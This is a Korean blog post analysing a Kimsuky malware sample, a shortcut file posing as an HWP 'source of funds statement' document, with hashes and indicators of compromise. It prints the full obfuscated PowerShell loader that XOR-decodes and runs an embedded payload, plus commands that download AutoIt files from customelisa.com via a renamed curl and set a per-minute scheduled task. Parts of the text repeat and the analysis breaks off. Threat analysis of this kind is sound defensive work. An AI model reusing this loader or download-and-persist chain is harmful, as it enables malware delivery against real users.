북한 해킹 단체 김수키(Kimsuky)에서 만든 악성코드-자금출처명세서(2025.5.26)
Contents
오늘은 북한 해킹 단체 김수키(Kimsuky)에서 만든 악성코드인 자금출처명세서(2025.5.26)을 분석을 하는 시간을 가져 보겠습니다.
일단 해당 악성코드는 기본적으로 바로가기(lnk)로 돼 있으며 악성코드 실행 시 대충 아이콘을 보면 아~Hwp 파일이 미끼 파일인 것을 확인할 수가 있을 것입니다.
파일명:자금출처명세서.lnk
사이즈:1 MB
MD5:fa529dd599e6d20dab3ffc95900e35cf
SHA-1:0b59408934d95418f0b82ea6ee408a98af1c75a9
SHA-256:545a059e5bc1ac9cc679c90d92454b53f2f0468c2aa09ad01358230e6c80d883
해당 악성코드는 PowerShell를 악용하는 악성코드입니다.
악의적인 PowerShell 코드
StringData
{
namestring: Type: HWP 2022 Document
Size: 27 KB
Date modified: 03/23/2025 14:51
relativepath: not present
workingdir: not present
commandlinearguments:
/c for /f "tokens=*" %a in ('dir C:\Windows\SysWow64\WindowsPowerShell\v1.0\*rshell(.)exe /
s /b /od') do c(a)ll %a "$detail=0;<#App-Pois?ning(#)>$charles='length';<#App-Pois(o)ning#
>$improved=Get-Locat(i)on;$calls=&(gcm *et-(C)hild*) *(.)lnk;<#App-Poisoni?g#>$calls=$call
s|where-obj(e)ct{$_.$charles -eq 0x00(0)088D1};<#App-Poisoning#>$recorded=($)calls;<#App-P
oisonin(g)#>$calls=$calls|S(e)(l)ect-Object -ExpandProperty Name;<#App-Poisoning#>if([stri
ng]::IsNullOrEmpty($calls)){$detail=1;<#App-Poisoning#>$impr(o)ved=$env:USERPROFI(L)E;<#App
-Po(i)soning#>$improved=$improved+'\appdata\local\t(e)mp';<#App-Poisoning#>$calls=Get-Ch(i)ld
Item -Path $improved -Recurse -Fil(t)er *(.)lnk|where-object{$_.$ch(a)rles -eq 0x000088D1}|
For(E)ach-Object{$_.FullN(a)me}|Select-Object -First 1;<#App-Poisoning#>$recorded=$calls};<
#App-Poisoning#>$lis(t)ing=$calls.substring(0,$c(a)lls.length-4);$avenu(e)=[System.IO(.)Bin
aryReader]::new([System.IO(.)File]::open($calls,[System.IO(.)FileMode]::Open,[System(.)IO(.
)FileAccess]::Read,[System(.)IO(.)FileShare]::R(e)ad));try{$ave(n)ue.BaseStream.Se(e)k(0x00
0017(D)C,[System(.)IO(.)SeekOrigin]::Begin);$vehicle=$avenue(.)ReadBytes(0x00(0)04800);}fin
ally{$ave(n)ue.Close()};$entr(a)nce=0;$latter=0;$displays=$vehi(c)le.count;while ($(e)ntran
ce -lt $displays){$which=0(x)01;$latter=$entrance-[math]::Floor($entr(a)nce/$which)*$which;
$q(u)ebec=0x8C(+)$latter;$vehicle[$ent(r)ance]=$vehicle[$entrance] -bxor $quebec;$entran?e?
+};[System.IO.F(i)le]::Write(A)(l)lBytes($listing,$vehicle);if($detail -eq 1){$oxford=$list
ing}else{$oxford='.\'+$listing};& $oxford;remove-item -path $recorded -force;"&DIHyMfmgebnu
pUYZFtCWvlwRTsxXzAQhqPVKJiSOELBkca||cd /d c:\Users\Public\Documents & copy c:\windows\syste
m32\curl(.)exe QeTLntG.exe & copy c:\windows\system32\schtasks(.)exe QeTLntG1(.)exe & QeTLn
tG -k -o AutoIt3.exe hxxps://customelisa(.)com/js/hurryup/?rv=bear^&za=battle0 & QeTLntG -k
-o grdyKAa(.)cdr hxxps://customelisa(.)com/js/hurryup/?rv=bear^&za=battle1 & QeTLntG1 /dele
te /tn "grdy(K)Aa" /f & QeTLntG1 /create /sc min(u)te /mo 1 /tn "g(r)dyKAa" /tr "c:\Users\P
ublic\Documents\AutoIt3(.)exe c:\Users\Public\Documents\grdyKAa(.)cdr"
iconlocation: .hwp
}
악성코드 분석
1.악성 코드 분석
특정 파일 탐색
dir 명령으로 rshell.exe를 검색 (/s)
/b: 경로만 출력
/od:최근 수정 순으로 정렬
결과를 찾으면 %a …
일단 해당 악성코드는 기본적으로 바로가기(lnk)로 돼 있으며 악성코드 실행 시 대충 아이콘을 보면 아~Hwp 파일이 미끼 파일인 것을 확인할 수가 있을 것입니다.
파일명:자금출처명세서.lnk
사이즈:1 MB
MD5:fa529dd599e6d20dab3ffc95900e35cf
SHA-1:0b59408934d95418f0b82ea6ee408a98af1c75a9
SHA-256:545a059e5bc1ac9cc679c90d92454b53f2f0468c2aa09ad01358230e6c80d883
해당 악성코드는 PowerShell를 악용하는 악성코드입니다.
악의적인 PowerShell 코드
StringData
{
namestring: Type: HWP 2022 Document
Size: 27 KB
Date modified: 03/23/2025 14:51
relativepath: not present
workingdir: not present
commandlinearguments:
/c for /f "tokens=*" %a in ('dir C:\Windows\SysWow64\WindowsPowerShell\v1.0\*rshell(.)exe /
s /b /od') do c(a)ll %a "$detail=0;<#App-Pois?ning(#)>$charles='length';<#App-Pois(o)ning#
>$improved=Get-Locat(i)on;$calls=&(gcm *et-(C)hild*) *(.)lnk;<#App-Poisoni?g#>$calls=$call
s|where-obj(e)ct{$_.$charles -eq 0x00(0)088D1};<#App-Poisoning#>$recorded=($)calls;<#App-P
oisonin(g)#>$calls=$calls|S(e)(l)ect-Object -ExpandProperty Name;<#App-Poisoning#>if([stri
ng]::IsNullOrEmpty($calls)){$detail=1;<#App-Poisoning#>$impr(o)ved=$env:USERPROFI(L)E;<#App
-Po(i)soning#>$improved=$improved+'\appdata\local\t(e)mp';<#App-Poisoning#>$calls=Get-Ch(i)ld
Item -Path $improved -Recurse -Fil(t)er *(.)lnk|where-object{$_.$ch(a)rles -eq 0x000088D1}|
For(E)ach-Object{$_.FullN(a)me}|Select-Object -First 1;<#App-Poisoning#>$recorded=$calls};<
#App-Poisoning#>$lis(t)ing=$calls.substring(0,$c(a)lls.length-4);$avenu(e)=[System.IO(.)Bin
aryReader]::new([System.IO(.)File]::open($calls,[System.IO(.)FileMode]::Open,[System(.)IO(.
)FileAccess]::Read,[System(.)IO(.)FileShare]::R(e)ad));try{$ave(n)ue.BaseStream.Se(e)k(0x00
0017(D)C,[System(.)IO(.)SeekOrigin]::Begin);$vehicle=$avenue(.)ReadBytes(0x00(0)04800);}fin
ally{$ave(n)ue.Close()};$entr(a)nce=0;$latter=0;$displays=$vehi(c)le.count;while ($(e)ntran
ce -lt $displays){$which=0(x)01;$latter=$entrance-[math]::Floor($entr(a)nce/$which)*$which;
$q(u)ebec=0x8C(+)$latter;$vehicle[$ent(r)ance]=$vehicle[$entrance] -bxor $quebec;$entran?e?
+};[System.IO.F(i)le]::Write(A)(l)lBytes($listing,$vehicle);if($detail -eq 1){$oxford=$list
ing}else{$oxford='.\'+$listing};& $oxford;remove-item -path $recorded -force;"&DIHyMfmgebnu
pUYZFtCWvlwRTsxXzAQhqPVKJiSOELBkca||cd /d c:\Users\Public\Documents & copy c:\windows\syste
m32\curl(.)exe QeTLntG.exe & copy c:\windows\system32\schtasks(.)exe QeTLntG1(.)exe & QeTLn
tG -k -o AutoIt3.exe hxxps://customelisa(.)com/js/hurryup/?rv=bear^&za=battle0 & QeTLntG -k
-o grdyKAa(.)cdr hxxps://customelisa(.)com/js/hurryup/?rv=bear^&za=battle1 & QeTLntG1 /dele
te /tn "grdy(K)Aa" /f & QeTLntG1 /create /sc min(u)te /mo 1 /tn "g(r)dyKAa" /tr "c:\Users\P
ublic\Documents\AutoIt3(.)exe c:\Users\Public\Documents\grdyKAa(.)cdr"
iconlocation: .hwp
}
악성코드 분석
1.악성 코드 분석
특정 파일 탐색
dir 명령으로 rshell.exe를 검색 (/s)
/b: 경로만 출력
/od:최근 수정 순으로 정렬
결과를 찾으면 %a …
IoC
https://customelisa.com/js/hurryup/?rv=bear&za=battle1
https://customelisa.com/js/hurryup/?rv=bear^&za=battle1
http://grdyKAa.cdr
https://customelisa.com/js/hurryup/?rv=bear^&za=battle0
http://\Users\Public\Documents\grdyKAa.cdr
https://customelisa.com/js/hurryup/?rv=bear&za=battle0
fa529dd599e6d20dab3ffc95900e35cf
0b59408934d95418f0b82ea6ee408a98af1c75a9
545a059e5bc1ac9cc679c90d92454b53f2f0468c2aa09ad01358230e6c80d883
https://customelisa.com/js/hurryup/?rv=bear^&za=battle1
http://grdyKAa.cdr
https://customelisa.com/js/hurryup/?rv=bear^&za=battle0
http://\Users\Public\Documents\grdyKAa.cdr
https://customelisa.com/js/hurryup/?rv=bear&za=battle0
fa529dd599e6d20dab3ffc95900e35cf
0b59408934d95418f0b82ea6ee408a98af1c75a9
545a059e5bc1ac9cc679c90d92454b53f2f0468c2aa09ad01358230e6c80d883